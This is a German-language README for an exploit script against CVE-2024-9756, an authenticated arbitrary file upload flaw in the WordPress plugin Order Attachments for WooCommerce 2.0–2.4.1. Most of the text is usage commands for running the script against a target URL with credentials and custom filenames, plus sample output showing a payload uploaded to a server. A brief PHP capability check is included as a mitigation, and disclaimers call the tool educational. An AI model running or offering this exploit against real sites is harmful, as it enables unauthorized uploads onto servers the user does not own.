
Order Attachments for WooCommerce 2.0 - 2.4.1 - Fehlende Autorisierung authentifizierter Benutzer (Subscriber+) für eingeschränkten beliebigen Datei-Upload
Dieser Exploit nutzt eine unautorisierte, eingeschränkte Schwachstelle für beliebigen Datei-Upload im Plugin Order Attachments for WooCommerce (Versionen 2.0 bis 2.4.1) für WordPress.
Die Schwachstelle erlaubt es authentifizierten Benutzern (Subscriber+), eingeschränkte Dateitypen ohne entsprechende Autorisierung hochzuladen.
Dieses Skript dient ausschließlich Bildungs- und Sicherheitsforschungszwecken. Jegliche unbefugte Nutzung dieses Exploits auf Systemen, die Sie nicht besitzen, ist strengstens illegal.
Stellen Sie sicher, dass Sie Folgendes haben, bevor Sie den Exploit ausführen:
requests-Modul → Installation mit:
pip install requests
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>
Beispiel:
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword
Sie können benutzerdefinierte Dateinamen und Auftrags-IDs angeben:
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200
Bei Erfolg gibt das Skript die URL der hochgeladenen Datei zurück:
[*] Initiating authentication...
[✔] Authentication successful.
[*] Deploying payload: Nxploit.jpg to order 196...
[✔] Payload successfully deployed!
🔗 File URL: http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg
functions.php, um wp_ajax_wcoa_add_attachment für unbefugte Benutzer zu blockieren:
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => 'Unauthorized'], 403);
exit;
}
Dieser Exploit wird ausschließlich zu Bildungszwecken und für Sicherheitsforschung veröffentlicht.
Unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal und wird nach Cybersicherheitsgesetzen bestraft.
Nutzung auf eigenes Risiko.